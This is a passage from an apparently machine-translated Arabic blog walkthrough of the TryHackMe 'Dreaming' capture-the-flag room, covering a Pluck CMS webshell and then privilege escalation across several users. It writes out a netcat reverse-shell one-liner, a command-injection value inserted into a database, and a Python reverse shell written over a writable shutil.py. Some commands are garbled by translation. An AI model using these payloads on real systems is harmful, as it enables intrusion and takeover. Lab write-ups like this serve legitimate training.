لقد غطينا حاول HackMe الحلم التحدي حيث أظهرنا مفاهيم اختبار الاختراق مثل استغلال نسخة ضعيفة من Pluck CMS للحصول على غلاف عكسي. ثم بدأنا عملية تصعيد امتيازات Linux الأفقية. لقد انتقلنا بين مستخدمين مختلفين بامتيازات متناوبة مثل www-data، وlucien، وdeath، وmorpheus. من خلال مجموعة من أذونات الملفات الضعيفة والامتيازات المعينة بشكل غير صحيح وبيانات الاعتماد المشفرة، تمكنا من تصعيد الامتيازات إلى أعلى مستخدم، Morpheus، وإنهاء التحدي.

احصل على ملاحظات OSCP

الدورة العملية الكاملة لاختبار اختراق تطبيقات الويب

أبرز مقاطع الفيديو

أول شيء سنبدأ به هو فحص Nmap الذي يكشف عن منفذين مفتوحين وهما 22 و80.
نبدأ بصفحة الويب عند المنفذ 80 وهي صفحة Apache الافتراضية التي تحولنا إلى استخدام gobuster للكشف عن الدليل/التطبيق.
لذلك يكشف المسار كما يمكنك رؤية التطبيق مباشرة مع التكنولوجيا المستخدمة على خادم الويب، وهو نظام إدارة المحتوى (CMS) مع الإصدار 4.7.13. تم تزويد الإصدار بتقنية البرنامج لذا يتعين عليك البحث عن استغلال مطابق باستخدام searchsploit. يتطلب الاستغلال وصولاً موثقًا يمكن الحصول عليه من خلال النقر على رابط "المسؤول" واستخدام "كلمة المرور" ككلمة مرور لتسجيل الدخول إلى لوحة الإدارة الخاصة بـ Pluck CMS. لذلك، لدينا المتطلبات اللازمة لتشغيل الاستغلال وتحميل webshell.

من webshell، يمكننا استخدام netcatverse shell : rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.2.81.146 4547 >/tmp/f

لذلك نرى أن لدينا نصين بايثون أدناه /يختار، يقرر أحدهما هو getdreams.py والآخر هو test.py الذي يحتوي على كلمة مرور النص العادي للمستخدم Lucien.
التالي باستخدام سودو -l لعرض امتيازات المستخدم لوسيان لتجد أن lucien يمكنه تنفيذ ما يلي كمستخدم موت

Sudo -u Death /user/lib/python3.8 /home/death/getDreams.py

GetDreams.py هو برنامج نصي بلغة python لإجراء بعض العمليات على خادم SQL الخاص بي، فلماذا لا نقوم بتسجيل الدخول إلى خادم SQL الخاص بي ومعرفة ما يحدث؟ يمين؟ فكيف ننظر إلى خادم SQL الخاص بي. نحن نلقي نظرة على ملف سجل bash الخاص بالمستخدم لوسيان:

القط .bash_history سيكشف الإخراج عن الأمر الكامل لتسجيل الدخول إلى خادم MYSQL.

عندما نقوم بتسجيل الدخول إلى SQL Server الخاص بي، سنبدأ عملية تعداد MySQL لذا نعرض أولاً قواعد البيانات كما ترون لدينا قاعدة بيانات فريدة واحدة تسمى مكتبة.

إظهار قواعد البيانات؛

مكتبة الاستخدام؛

اختر * من الأحلام؛

أدخل في قيم الأحلام (الحالم، الحلم) ("الحقن"، "$(/bin/bash)";

نحن نعلم أن لوسيان يمكنه تشغيل نص بايثون كـ sudo، لذا الآن إذا قمت بالتنفيذ، فسنحصل على shell باعتباره مستخدم الموت.

لذلك من شبكة الاتصالات العالمية البيانات داخل لوسيان والآن إلى مورفيوس مستخدم.
فكيف يمكن تصعيد الامتيازات أولاً بإلقاء نظرة خاصة على محتويات الدليل التابع لذلك المستخدم. سأرى أن هناك نصًا برمجيًا اسمه Restore.py وهو نص برمجي بيثون إذا ألقينا نظرة على نص python الذي نراه يستخدمه Shutil الوحدة النمطية في بيثون لإجراء النسخ الاحتياطي. لذا فإن نظرة سريعة على هذا الملف في /usr/lib/python3.8/shutil.py تكشف أن المجموعة موت يمكن تحرير هذا الملف لذلك نقوم بإدخال غلاف عكسي لـ python بعد إلغاء محتواه للحصول على الغلاف الأخير كـ مورفيوس مستخدم.

صدى "" > /usr/lib/python3.8/shutil.py

صدى "مقبس الاستيراد,عملية فرعية;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));subprocess.call(["/bin/sh"" -i”],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())” > /usr/lib/python3.8/shutil.py

إجابات الغرفة

ما هو علم لوسيان؟
ما هو علم الموت؟

تجول الفيديو

, , , ,
عرض التعليقات

معتصم

عن المؤلف

أقوم بإنشاء ملاحظات حول الأمن السيبراني وملاحظات التسويق الرقمي والدورات التدريبية عبر الإنترنت. أقدم أيضًا استشارات التسويق الرقمي بما في ذلك، على سبيل المثال لا الحصر، تحسين محركات البحث وإعلانات Google وMeta وإدارة CRM.

عرض المقالات